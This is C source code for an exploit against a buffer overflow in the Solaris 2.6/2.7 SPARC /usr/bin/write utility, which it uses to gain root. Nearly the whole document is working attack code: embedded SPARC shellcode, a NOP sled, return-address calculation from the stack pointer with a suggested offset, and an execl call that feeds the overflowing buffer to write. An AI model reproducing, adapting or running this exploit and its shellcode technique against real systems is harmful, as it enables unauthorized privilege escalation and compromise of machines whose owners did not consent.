Proof of concept code for the Solaris 2.6 and 2.7 (SPARC) "write" buffer overflow. Guile Cool
f21badab966bdf7e602bc08f4a5c985093b94ac2fd1db132e7a1e225c048e477
/* Vulnerability: $/usr/bin/write root overflow for solaris 2.6 and 2.7
Exploit for sparc by Guilecool $%# -()- The ImperialS -()- $%#
Thanks to Pablo Sor, Buenos Aires, Argentina who coded the sploit for x86 arch!!!
This is only a Proof of concept
USAGE:
$./exploit offset try to use 1668 as default offset!
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#define BUF_LENGTH 91 // bufsize max = 87 --> 88 seg fault!
#define EXTRA 100
// #define STACK_OFFSET right Offset should be 1668!
#define SPARC_NOP 0xa61cc013
u_char sparc_shellcode[] =
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";
u_long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA];
long targ_addr,STACK_OFFSET;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode);
if (argc < 1) printf ("Insert the Offset and run the program back!!!");
STACK_OFFSET = atoi (argv[1]);
long_p = (u_long *) buf;
for (i = 0; i<(BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
char_p = (u_char *) long_p;
for (i = 0; i<code_length; i++)
*char_p++ = sparc_shellcode[i];
long_p = (u_long *) char_p;
targ_addr = get_sp() - STACK_OFFSET;
for (i = 0; i<EXTRA / sizeof(u_long); i++)
*long_p++ = targ_addr;
printf("Exploit for sparc by The ImperialS - Guilecool\n");
printf("Jumping to address 0x%lx\n", targ_addr);
execl("/usr/bin/write", "write", "root", buf, (char *) 0);
perror("execl failed");
}
/* http://www.self-evident.com */